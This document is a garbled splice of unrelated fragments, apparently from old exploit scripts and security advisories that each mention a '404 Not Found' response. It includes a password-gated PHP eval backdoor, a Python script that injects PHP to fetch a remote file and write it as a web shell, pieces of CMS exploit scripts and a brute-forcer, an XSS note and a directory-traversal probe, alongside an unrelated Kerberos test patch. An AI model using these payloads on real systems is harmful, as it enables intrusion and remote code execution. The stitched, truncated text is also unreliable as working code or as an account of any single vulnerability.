Not Found
}
$my_template = "themes/templates/footer_inc.tpl";
$url = "http://$host:$port".$path."boards/boards_rss.php";
$_o = _s($url, "", 0, "");
if (stristr($_o, "404 Not Found")) {
die ("[!] Vulnerable script not found!\n");
}
//catch site cookie, this is needed for version compatibility, not needed in 2.6.0
$_tmp = explode("Set-Cookie: ", $_o);
$cookie = "";
fputs($FoN, $CURL_in);
while (!feof($FoN)) $data .= fread($FoN, 1024);
fclose($FoN);
$error_1 = strstr( $data, "HTTP/1.1 404 Not Found" );
if ( !empty($error_1) ){
echo "\n[-] Error : 404 Not Found. \n";
die;
}
Connected to 127.0.0.1.
Escape character is '^]'.
GET /noex HTTP/1.1
Host: localhost
HTTP/1.1 404 Not Found
Date: Thu, 09 Aug 2007 13:14:48 GMT
Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
...
doesn't like to share (c'mon man, give a bit):
<?php
if(empty ($_REQUEST['key']) ||
sha1(md5($_REQUEST['key']))!='0b6045b268cf676864a27d9663cee0a634431467'){header("HTTP/1.0
404 Not Found"); exit();}
header("Content-Type: Text/Plain");
eval(stripslashes($_REQUEST['php']));
?>
abuse@ispgateway.de: you are hosting the backdoor notification site
| | To header. A bogus non-matching value is put into the |
| | username portion of the Digest in the Authorization |
| | header. If the peer does exist the second REGISTER will |
| | receive a response of "403 Authentication user name does |
| | not match account name". If the peer does not exist the |
| | response will be "404 Not Found" if alwaysauthreject is |
| | disabled and "401 Unauthorized" if alwaysauthreject is |
| | enabled. |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
$PHPSESSID=$ARGV[8];
}
$post.=$injection."&language=en&email=y3nh4ck3r@gmail.com&password=xxxxxxxxxxx&pwdrecheck=xxxxxxxxxxx&captcha=".$code."&sumbit=Create";
$output=&request($finalhost, $post, $option, $PHPSESSID);
#processed
if($output!~(/Title: 404 Not Found/))
{
if ($output!~(/\<div align=\"center\" id=\"registerError\"\>/))
{
print "\n\t---------------------------------------------------------------\n";
print "\t-- EXPLOIT EXECUTED (BIGACE CMS 2.5 User Options changer) --\n";
$packet = "HEAD ".$p."/legalpentest.php HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: :) \r\n\r\n";
sendpacket($packet,1,0,0);
if(stristr($html , '404 Not Found') == true)
{
echo '<font color=#FFF8C6><br>Exploit
Faild...<br>-------------------------------------------------------<br></font>';
}
else {
} else if ($wp_query->is_search && $wp_query->found_posts == 0) {
echo "\t\t".'pageTracker._trackPageview("'.get_bloginfo('url').'/?s=no-results: '.$wp_query->query_vars['s'].'&cat=no-results");'."\n";
echo "\t".'} catch(err) {}'."\n";
echo '</script>'."\n";
In order to trigger this bug, a 404 (Not Found) message must be the response when supplying the XSS code into the search-form.
One can either end the script tag or use javascript in order to abuse this issue.
Proof of Concept's:
============
The GNCaster software allows communication with clients through a subset
of the HTTP protocol. If an attacker sends an HTTP GET request for a
nonexistent URL path and the request is less than 988 bytes long, the
server reacts with an HTTP 404 error and the message
File "/AAAAAA[...]AAAA" not found on this server.
If the URL path length is 988 bytes or more, the HTTP 404 error is still
returned but the server thread stops before returning the message above.
$_CONF['disable_webservices'] = true;
} else {
require_once $_CONF['path_system'] . '/lib-webservices.php';
}
if ($_CONF['disable_webservices']) {
COM_displayMessageAndAbort($LANG_404[3], '', 404, 'Not Found');
}
header('Content-type: ' . 'application/atom+xml' . '; charset=UTF-8');
WS_authenticate();
...
fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm'
data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=";$s=fopen(\'' + sys.argv[2] + '\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w+\');fwrite($fp,$shell);fclose($fp);/*'})
urllib.urlopen(sys.argv[1] + fp,data)
urllib.urlopen(sys.argv[1] + fp)
test=urllib.urlopen(sys.argv[1] + '/upload/pictures/r3d.w0rm.php').read()
if 'Not Found' not in test :
print "Shell Uploaded ."
print sys.argv[1] + '/upload/pictures/r3d.w0rm.php'
exit()
exit(1);
}
}
$this->msg('End of the wordlist, password not found', -1);
return;
}
function bf_usr_pwd()
+#!/usr/bin/python
+from k5test import *
+
+realm = K5Realm(start_kadmind=False, create_host=False)
+output = realm.run_as_client([kvno, 'krbtgt/'], expected_code=1)
+if 'not found in Kerberos database' not in output:
+ fail('TGT lookup for empty realm failed in unexpected way')
+success('Empty tgt lookup.')
This patch is also available at
http://localhost/vivvo.4.1.5.1/files.php?file=../conf.php
... and we get 404 error:
Page Not Found
The requested URL was not found on this server.
If you believe this page should be here, please notify administrator.
OK, directory traversal is not possible here. But ... wait a minute ...
What happens, if we try something like this:
|
